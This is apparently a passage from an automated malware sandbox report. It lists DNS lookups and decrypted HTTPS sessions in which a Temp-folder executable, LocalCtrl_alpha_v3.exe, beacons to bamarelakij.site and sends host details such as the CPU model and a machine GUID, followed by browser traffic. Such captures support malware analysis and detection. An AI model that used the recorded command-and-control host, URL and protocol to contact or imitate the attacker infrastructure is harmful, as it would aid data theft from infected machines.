Jan 6, 2025 23:06:04.524154902 CET | 1.1.1.1 | 192.168.2.4 | 0x8f3 | No error (0) | fg.microsoft.map.fastly.net | - | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 23:06:04.524154902 CET | 1.1.1.1 | 192.168.2.4 | 0x8f3 | No error (0) | fg.microsoft.map.fastly.net | - | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 23:06:08.538023949 CET | 1.1.1.1 | 192.168.2.4 | 0x8f3 | No error (0) | fg.microsoft.map.fastly.net | - | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 23:06:08.538023949 CET | 1.1.1.1 | 192.168.2.4 | 0x8f3 | No error (0) | fg.microsoft.map.fastly.net | - | 199.232.214.172 | A (IP address) | IN (0x0001) | false
2025-01-06 22:05:06 UTC | 162.159.61.3 | 192.168.2.4 | 0x0 | No error (0) | assets.msn.com | assets.msn.com.edgekey.net | - | CNAME (Canonical name) | IN (0x0001) | true
2025-01-06 22:05:06 UTC | 162.159.61.3 | 192.168.2.4 | 0x0 | No error (0) | assets.msn.com | assets.msn.com.edgekey.net | - | CNAME (Canonical name) | IN (0x0001) | true
• bamarelakij.site
• clients2.googleusercontent.com
• chrome.cloudflare-dns.com
• https:
  • sb.scorecardresearch.com
  • browser.events.data.msn.com
  • c.msn.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49739 | 104.21.80.52 | 443 | 4176 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 22:04:46 UTC | 352 | OUT | POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
Content-Length: 147
Host: bamarelakij.site
2025-01-06 22:04:46 UTC | 147 | OUT | Data Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 00 60 00 00 00 00 00 00 00 00 00 00 00 fe ff ff ff 97 00 a0 d9 26 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a a0 ce 64 88 dc 82 cf 01 d9 f5 d7 9d 1e 13 ec d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
Data Ascii: `&Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzd$9e146be9-c76a-4720-bcdb-53011b87bd06
2025-01-06 22:04:47 UTC | 845 | IN | HTTP/1.1 200 OK
Date: Mon, 06 Jan 2025 22:04:47 GMT
Transfer-Encoding: chunked
Connection: close
v: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQ
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vIfBE3pia3T2yuCOxbxeC0uxGP2hBIq9zxdMt5XHQDld2YvLnVDHC2rDaFK7gaYjnhkVqH5VPTkXfKRoIv%2BmTF1YS6q7%2Fvm54iRdwpEyh0ylFogmmQrT0RPw9KbhyfnmRZrZ"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fdf01796ac942b5-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=12353&min_rtt=1876&rtt_var=7082&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1135&delivery_rate=1556503&cwnd=218&unsent_bytes=0&cid=812337631cbfe182&ts=478&x=0"
                                                                                                                                                            Data Ascii: 93:.2.886:7.2<evY=~M:Y:I$rYE"#"?oYoeQY199<QrYQT{yA sYeQY2928:1.&6:9.6;621L


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49740 | 104.21.80.52 | 443 | 4176 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-06 22:04:48 UTC | 455 | OUT | POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
    fileid: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQ
    Content-Length: 53
    Host: bamarelakij.site
2025-01-06 22:04:48 UTC | 53 | OUT | Data Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 03 02 00 00 00 00 00 00 00 00 00 00 00 fe ff ff ff 91 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
    Data Ascii:
2025-01-06 22:04:48 UTC | 744 | IN | HTTP/1.1 200 OK
    Date: Mon, 06 Jan 2025 22:04:48 GMT
    Transfer-Encoding: chunked
    Connection: close
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ka5IbxYeTI1Qz14%2FFqz8rOS7IVrkNvkGsK40nruBJZH0iVubacciCLHEEqMUZhrJN1Ugp3fCQIBWlLzcDE5Xnt%2FT9038IXbv8tshPwf0vFfuCEaqtaS6yWOkeWIQTNqr8paS"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8fdf01810b780caa-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1667&min_rtt=1661&rtt_var=635&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1144&delivery_rate=1708601&cwnd=239&unsent_bytes=0&cid=d24cd247c8769b2f&ts=368&x=0"
2025-01-06 22:04:48 UTC | 24 | IN | Data Raw: 31 32 0d 0a 02 00 00 00 00 00 00 00 00 00 00 00 fe ff ff ff 91 90 0d 0a
    Data Ascii: 12
2025-01-06 22:04:48 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49741 | 104.21.80.52 | 443 | 4176 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-06 22:04:49 UTC | 456 | OUT | POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
    fileid: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQ
    Content-Length: 208
    Host: bamarelakij.site
2025-01-06 22:04:49 UTC | 208 | OUT | Data Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 95 00 00 00 08 00 00 00 52 00 00 00 b5 05 3d 2c 95 a7 40 16 d7 35 c9 59 81 00 00 00 00 00 00 00 00 00 00 00 da 82 9e 16 49 60 48 31 00 00 00 00 00 00 00 00 00 00 00 da 82 9e 16 28 a5 03 03 16 00 00 00 00 00 00 00 96 00 96 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 a5 03 83 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 28 a5 82 03 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
    Data Ascii: R=,@5YI`H1(((
2025-01-06 22:04:49 UTC | 820 | IN | HTTP/1.1 204 No Content
    Date: Mon, 06 Jan 2025 22:04:49 GMT
    Connection: close
    v: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQ
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=caZ6WVqCsXuP24mf4%2FviQidt9cIy4PMJOhL0IEl6BH98uKArUkX9ygbEY4Hv6efFl6C7GPT6tTinGRmFF4JBkLzrc9nxzYeCTuNyXscc2sXEmWE2873BwCXp9aU1AeYsjxoY"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8fdf01879cc6437a-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1620&min_rtt=1620&rtt_var=810&sent=5&recv=7&lost=0&retrans=1&sent_bytes=4214&recv_bytes=1300&delivery_rate=300535&cwnd=223&unsent_bytes=0&cid=9e2b855fa531b5af&ts=355&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49768 | 142.250.186.97 | 443 | 5632 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-06 22:05:03 UTC | 594 | OUT | GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
    Host: clients2.googleusercontent.com
    Connection: keep-alive
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: empty
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2025-01-06 22:05:03 UTC | 563 | IN | HTTP/1.1 200 OK
    X-GUploader-UploadID: AFiumC5-6XtLPRqSlIEtPq2b_tm7Gpf6mBFTggBpF98XrN213j0iZB6RyTKkBLsWuNGWLxpS
    Accept-Ranges: bytes
    Content-Length: 154477
    X-Goog-Hash: crc32c=F5qq4g==
    Server: UploadServer
    Date: Mon, 06 Jan 2025 15:58:13 GMT
    Expires: Tue, 06 Jan 2026 15:58:13 GMT
    Cache-Control: public, max-age=31536000
    Age: 22010
    Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT
    ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083
    Content-Type: application/x-chrome-extension
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close
2025-01-06 22:05:03 UTC | 827 | IN | Data Raw: 43 72 32 34 03 00 00 00 f3 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08
    Data Ascii: Cr240"0*H0^1"wgt2JG1)X4=&?[j,Lzjue[Iq*Ba/XPhL2%3_oH)'=e?j3UH|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
2025-01-06 22:05:03 UTC | 1390 | IN | Data Raw: d2 ff f8 fb 8f f1 b3 aa ea fc 5a ff 65 a8 3e ff f2 76 56 d5 8f bf fe b8 9e df fb 4a fe 2c 2f fd 58 f5 e3 8f bf ff eb c7 90 3f d4 25 97 fa fc ea 11 36 05 b0 0d c1 6d 23 05 75 5d 82 5a 95 8f c3 96 5b d7 73 d6 4d 5f 19 18 df 4a a0 b6 22 39 6c 91 fb 6c a3 f3 fd 2c 7c d5 8b 14 19 87 e6 72 d6 e7 d7 51 43 c1 e1 fb ef 9d ba 8a 34 3a 9f d4 f8 cb a1 77 6a e9 bf 9f 4f e7 c3 14 35 ef b7 d2 b7 fb ef 73 ca 6e f7 25 e1 ee 92 a5 e8 f2 fd 79 01 10 17 0f 63 e2 fc fd 91 b4 23 46 0c 8e b4 1b 1b e1 a3 2e ef a8 29 67 76 28 cd 10 21 53 ec 49 17 3e f2 20 dc 54 be b0 c5 23 dc 1d 83 eb b9 f4 a1 91 ef 0f db 83 da 5d 0b 80 ea c2 67 f3 11 c0 ee 08 4c 55 5a a8 16 40 1f 77 c3 5c 80 cd f9 b8 0f 1f 05 d8 fd 7b 9d df f7 16 4e b9 a7 7a 66 d5 6e 02 19 3a 72 f1 95 74 0c 72 0e cf 9c ab 3d a2
    Data Ascii: Ze>vVJ,/X?%6m#u]Z[sM_J"9ll,|rQC4:wjO5sn%yc#F.)gv(!SI> T#]gLUZ@w\{Nzfn:rtr=
2025-01-06 22:05:03 UTC | 1390 | IN | Data Raw: fb 40 b0 b4 75 cd a2 45 ec b5 f7 5f 79 7d 9c cd 6c 12 a9 d6 7b 85 01 32 0c 8b 32 98 4b 0f f9 85 0b e3 3c 40 38 52 9e 25 bb 7a 8f 3d a8 39 20 c4 e5 c3 0c b0 21 bf 16 af df 1f d6 7a ee 0d 99 c3 31 ea 95 12 c6 e4 1c 29 ba 47 74 ec a8 92 fb c2 95 5e e2 ca b0 a4 22 c6 26 76 ca 5e 73 34 d5 7c c4 e8 14 05 cb 7b 5f fe 1f 38 b8 6c f0 90 19 b5 92 81 f8 cc 81 4a 13 2f 1a 49 e0 78 71 23 7a 01 c2 0c 77 ba 14 2c e7 2c 3c 91 d1 4e bc 96 0a 3a 18 c8 cd 72 ef c9 b5 f8 8f da e7 6e b0 2f 3c 34 d7 ad f4 42 40 4c d8 a1 40 88 dc 18 8e 64 d6 1c e0 63 1e 05 cf 20 06 f7 3b 0b 70 9c 51 ec 56 dd fb 7d 11 7f 6b 6d ef 0d 1e 52 b0 4d ad e1 45 2a 6f 3e c1 ba 25 26 a2 d8 aa 43 9d 31 12 d1 9a b3 ce 3a 54 eb 81 1f 1b e6 0b 22 ca 2f 2d 08 8a 65 ef 77 c9 57 62 8f 5b 75 cd 1a e5 55 bd 63 44
    Data Ascii: @uE_y}l{22K<@8R%z=9 !z1)Gt^"&v^s4|{_8lJ/Ixq#zw,,<N:rn/<4B@L@dc ;pQV}kmRME*o>%&C1:T"/-ewWb[uUcD
2025-01-06 22:05:03 UTC | 1390 | IN | Data Raw: ae 14 17 a9 0a ca 56 6b be f7 64 1f 49 78 97 5a b7 31 fc 9e 6d a1 03 6f d9 e7 f7 53 08 01 c3 c5 b9 7a b9 76 b6 db 53 9b 34 0a 6b 4e 57 59 c3 5e 19 bf 00 5d 8b aa e8 60 1e 51 13 25 a6 e3 15 9d 7d ca 7d 96 c5 a9 08 a9 a5 b6 19 1f 60 d5 2f 62 7f 2f 56 f2 3d 57 f8 23 62 ea 11 f9 e1 a4 f7 19 e1 40 b8 32 a8 3b d1 0e 75 e4 ef 5e a5 8b 7d 02 3c b3 b0 c2 54 f7 e1 89 cc ec 28 67 76 59 d4 5a cb 31 52 23 4c d6 ce d6 b5 6f 6c b9 2b 3b 9d 71 b7 59 27 29 f2 cd 97 cc b0 23 c2 6d 96 10 c7 cf 94 88 f2 6e 6a 64 2b 51 dc e1 73 d9 1f ee 59 f3 bf e0 1f e0 37 0a e3 95 33 5e 91 a6 46 6d ea cf 64 89 31 b8 c4 90 37 6a 0a ad fa f8 c0 5c 14 73 a2 84 ce 1a f7 08 d6 da 7b b1 29 06 b5 cf 3b d4 47 7c d1 e7 3f 8a b5 cf 36 82 c8 ca 3a 7b 7f 72 db 3b 69 f1 47 d9 87 17 cd 7f 57 ce c3 98 bb
    Data Ascii: VkdIxZ1moSzvS4kNWY^]`Q%}}`/b/V=W#b@2;u^}<T(gvYZ1R#Lol+;qY')#mnjd+QsY73^Fmd17j\s{);G|?6:{r;iGW
2025-01-06 22:05:03 UTC | 1390 | IN | Data Raw: fd bb 9e 52 c0 c6 ac 63 6d 6a 7d 63 a0 ee bf 61 fe 67 d7 ed a2 91 18 ea 83 e8 bc 84 3c f6 92 99 0e 39 52 fb 50 a4 8e 8d b9 50 b4 45 0e 0e e8 5c f4 48 13 5f 36 61 f7 d9 4a 58 d8 a4 e0 0f 1c 33 8b 34 04 b9 4e a3 a9 25 bf ca 6e d4 75 b6 3b e7 dc 7e 2b 83 f0 4b fc 4f d7 6f 8d 99 43 f4 2a 3b 16 67 fd f0 c0 81 0c 22 df 3e 68 cf fc 25 d5 a0 cd 23 dc 62 3a 6c 78 5f c7 cc 17 bd ce 53 9b 88 64 9b f2 5b 5f 98 71 3d 74 42 5f cb ac e5 6f 5a 85 bf 31 ff bd 96 74 6d fd 76 0d b8 3b 7f f7 5c 6e 6a 9f 9b 0e 4a ef 8f 11 b9 2d f8 fd b3 ca 10 dc fc ce f2 bf cd d3 72 cd a9 3a 3f 7e e8 ba 50 b9 e5 8c 85 66 3c 7d 7c cb b9 ae b1 2e d4 de 6e 77 cd fd f1 92 27 87 ff fc ac be ef 47 09 d4 77 ef e8 3d f4 6e 27 97 de a2 ef ff f7 ce 43 af 53 f3 cd ee 9a 5a 42 95 3d 1a be f9 ed d4 c0 dd
    Data Ascii: Rcmj}cag<9RPPE\H_6aJX34N%nu;~+KOoC*;g">h%#b:lx_Sd[_q=tB_oZ1tmv;\njJ-r:?~Pf<}|.nw'Gw=n'CSZB=
2025-01-06 22:05:03 UTC | 1390 | IN | Data Raw: 73 3d 2b b0 5b de b2 1b ac ac c0 bf bd 49 06 60 0a 98 e5 c3 12 dc fa fd 5e 94 c6 93 21 f3 32 c4 3a e7 6a 98 8e e5 33 47 4c 6f 66 cf 66 8f 00 02 a7 37 5d af 9f 55 1c 7d 2f aa 0d 63 45 34 4d 9c 3f 0c 6f 34 66 3d 1f 97 c5 b3 39 14 7b e1 d5 d2 27 58 29 01 4d de d6 12 94 45 a0 b2 25 18 06 ec ff 89 3f ee 0f 01 1c 62 05 b0 8e 6f 05 55 2b 9a 4e 2b 15 bb 5a f9 59 a9 86 d5 aa 13 d9 6a a3 fa 56 e4 c4 f6 2d 76 5b 8b dd a8 15 f0 25 70 2a 41 38 f2 87 e9 80 f6 c5 43 a6 19 c3 34 71 63 28 94 f7 d5 3e a8 8d fb a7 40 9e 7a b1 db b3 2a 31 8c 90 2f 56 e5 7c e4 f7 bb 83 9f 23 9a 0d 8c ce 42 04 aa 0d 19 a0 6f d7 b2 9f 34 76 5f 6d 6e 6e d6 69 e4 4e a8 e8 02 80 b4 a5 20 5a 4b c7 e1 90 e1 cc 0d d0 9a 83 61 2e 2f 3c 5f c9 d6 50 bd 42 9b 7a 69 bf 37 7e c9 9f 3e a7 e6 e3 76 c6 ba 83
    Data Ascii: s=+[I`^!2:j3GLoff7]U}/cE4M?o4f=9{'X)ME%?boU+N+ZYjV-v[%p*A8C4qc(>@z*1/V|#Bo4v_mnniN ZKa./<_PBzi7~>v
2025-01-06 22:05:03 UTC | 1390 | IN | Data Raw: 3d 19 8d fb dd dd 4b 60 21 0e f5 cc 1f 33 7c 0c d2 d1 00 b1 81 5e 69 42 40 e6 1a a3 91 ad d6 e5 68 63 43 03 68 03 51 81 cd 15 5b 50 25 01 0d 0a a0 cc 37 ab d0 e0 70 db 64 42 b6 9f 01 12 e5 58 36 df 46 f2 c0 36 2c 9a 5a d0 f7 89 35 0a f9 9b 66 01 58 a1 26 0c 6a 4d 5c 4b 7b e9 58 7b 57 de c3 72 c3 01 d2 14 c3 96 8f 11 ca 88 39 7c 1d 63 60 72 6c d4 ef 71 f2 9c 49 0e 9c cd 6d 82 37 6e c9 82 9c 2f 0b 6e 24 69 39 f2 e2 78 83 7f 53 04 3d b6 a3 da b9 a8 71 16 77 6c c9 a0 89 56 73 5e 14 11 7c 7c 73 cb 7f 2a d9 f2 39 07 8f 6b 7d 56 ca c0 8d 61 7f 28 ec 36 ce 58 4c 31 40 12 ec 2c 6f 2c 2b 48 03 40 f2 e5 2b 62 36 46 17 48 75 0a bd e4 dc 22 b3 6e 9c 63 a5 86 71 d4 b8 31 30 23 af 19 81 78 83 e3 e9 5a 37 f8 9c 4b 22 f0 7a 80 ff ce 66 cd 63 e2 27 5d 67 e0 5c b9 05 91 82
    Data Ascii: =K`!3|^iB@hcChQ[P%7pdBX6F6,Z5fX&jM\K{X{Wr9|c`rlqIm7n/n$i9xS=qwlVs^||s*9k}Va(6XL1@,o,+H@+b6FHu"ncq10#xZ7K"zfc']g\
2025-01-06 22:05:03 UTC | 1390 | IN | Data Raw: fc c2 eb d3 07 f9 cb a9 80 c2 b8 ec 66 aa f4 9a a9 4f 23 9b 16 c3 b7 0c e9 94 d8 01 42 0d 39 01 c1 0c 00 05 bb 46 fd 6c 74 68 20 1a 73 50 b5 25 bf 9b 6b a1 76 bd ec 3e 5a 2f 34 82 c8 be 2c eb 72 e9 75 b9 81 5a f1 03 58 07 57 22 05 05 6e 85 8b 28 3e ed b7 c4 45 0d bd de ae 37 13 31 f9 80 3b 68 01 71 40 1d 01 b4 9c 4e 2d fe e0 0a c4 3b eb d6 d2 a0 03 02 2f 96 20 44 6d 8b bf 7c 02 6e 06 9b 90 bf 10 fe 39 81 a6 8e a4 2a f2 45 4e 66 1c a4 2b 79 31 d8 41 b0 51 04 2d 99 39 bc 77 2e 54 8b 76 6d a7 d8 02 27 86 e2 f3 dc 57 e3 03 ad 3a ec 69 93 fb 84 77 d0 7c da 4b 0a 2e 39 2d a6 36 d1 88 83 03 6c 5b fc 2f 79 5b 7d d8 a9 35 da cd 0e 88 f8 e2 03 a7 27 d3 a9 e0 0c 12 9c 09 82 d3 79 24 9a 2b cc 48 be 25 3a ab ff d0 19 81 59 31 2f 46 8c 01 89 b0 9a f6 ea aa b3 5c b7 89
    Data Ascii: fO#B9Flth sP%kv>Z/4,ruZXW"n(>E71;hq@N-;/ Dm|n9*ENf+y1AQ-9w.Tvm'W:iw|K.9-6l[/y[}5'y$+H%:Y1/F\
2025-01-06 22:05:03 UTC | 1390 | IN | Data Raw: 41 d0 ce 03 89 61 57 3a e2 0c 48 31 96 53 3b 09 22 96 46 85 74 06 dc 97 14 6e 80 5c 17 6e 36 1a 8d 75 f8 7f 78 5c 36 a8 54 68 6b 72 c2 09 eb c5 52 50 48 b9 ff e5 a7 0f 83 fe 39 c0 51 2f 55 aa a1 dd 0a 37 5c c2 bc b6 5f 75 f5 b9 25 6c 88 f3 83 06 9b 56 b8 4a 65 5e 38 8b ca 20 06 d7 57 1a f5 b5 67 d3 e7 cf d7 5e bd b0 17 96 14 85 5e 3c 5b 03 09 6f 56 e4 52 22 10 cb 74 09 03 2f bd f9 23 7e 95 07 5a 94 28 41 b2 07 11 ae 60 79 c8 fb cd c2 c6 aa 3b ff 69 1b 7c 15 7c 8c 84 24 dc 79 fa e4 d1 a3 a5 ed fe e0 66 98 c6 c9 78 09 45 c6 ed ac 3f 9a 0c c3 a5 83 d4 1b b2 e1 cd d2 d6 64 9c f4 87 a3 da a3 a5 d3 0f 3b df 56 0f 52 3f ec 8d c2 d5 fd 00 d6 3f 8d d2 70 d8 5c da 1a 80 ee 12 ae ae d5 ea 8f 9e 3c a5 a3 07 57 cc bd 02 12 70 3b 73 2e 49 16 9f 4e 31 20 51 39 f9 af 05
    Data Ascii: AaW:H1S;"Ftn\n6ux\6ThkrRPH9Q/U7\_u%lVJe^8 Wg^^<[oVR"t/#~Z(A`y;i||$yfxE?d;VR??p\<Wp;s.IN1 Q9
2025-01-06 22:05:03 UTC | 1390 | IN | Data Raw: 87 13 fa f8 51 4e 97 0f d5 84 e9 74 fa 59 da 7c bf e3 19 63 e7 07 e3 a7 9c f0 cd e3 fc 08 b5 3a ce 6e 1e 74 71 58 2e 86 7b e3 3e 33 82 51 35 c1 d9 f3 e4 51 51 26 64 2c af 85 36 8b 9c 7b 7a b0 77 c8 75 fa 03 ca fd a0 c3 ce 9a 6e be f5 7a 7b 67 77 ef cd db fd 77 ef 0f 0e 8f 8e 3f 7c 3c 39 fd f4 f9 cb d7 6f df 7f 30 cf 87 a1 c4 49 7a 7e 91 75 7b fd c1 af e1 68 3c b9 bc ba be f9 5d 6f ac 3d 5b 7f fe e2 ef 97 af f2 63 f2 15 f4 d6 9e 55 aa 4f dd 8a 03 ff c2 3f ab 3f 5d fa b7 46 ff 56 3a 94 2b 20 dc 78 de 0a 95 8b c3 47 91 c8 67 63 2b 40 91 24 6f ca 6e 7d 87 bd d2 71 e7 b6 91 dc ac b1 6c 22 71 23 d8 4d ad 1f 0c cf f9 69 73 e6 2f 50 b6 99 79 ee 77 4a 8a 21 24 4f 4b 33 1e c8 1d fb f4 19 74 19 80 e6 f6 62 bd 83 59 19 a8 db d0 e5 f1 d2 79 f6 89 b5 56 54 75 9f c9 63
    Data Ascii: QNtY|c:ntqX.{>3Q5QQ&d,6{zwunz{gww?|<9o0Iz~u{h<]o=[cUO??]FV:+ xGgc+@$on}ql"q#Mis/PywJ!$OK3tbYyVTuc


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49809 | 162.159.61.3 | 443 | 5632 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 22:05:05 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2025-01-06 22:05:05 UTC | 128 | OUT | Data Ascii: wwwgstaticcom)TP
2025-01-06 22:05:05 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Mon, 06 Jan 2025 22:05:05 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8fdf01ec9b95f795-EWR
alt-svc: h3=":443"; ma=86400
2025-01-06 22:05:05 UTC | 468 | IN | Data Ascii: wwwgstaticcom@C)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49808 | 172.64.41.3 | 443 | 5632 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 22:05:05 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2025-01-06 22:05:05 UTC | 128 | OUT | Data Ascii: wwwgstaticcom)TP
2025-01-06 22:05:05 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Mon, 06 Jan 2025 22:05:05 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8fdf01ec9b1343d4-EWR
alt-svc: h3=":443"; ma=86400
2025-01-06 22:05:05 UTC | 468 | IN | Data Ascii: wwwgstaticcom$Pc)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49810 | 172.64.41.3 | 443 | 5632 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 22:05:05 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
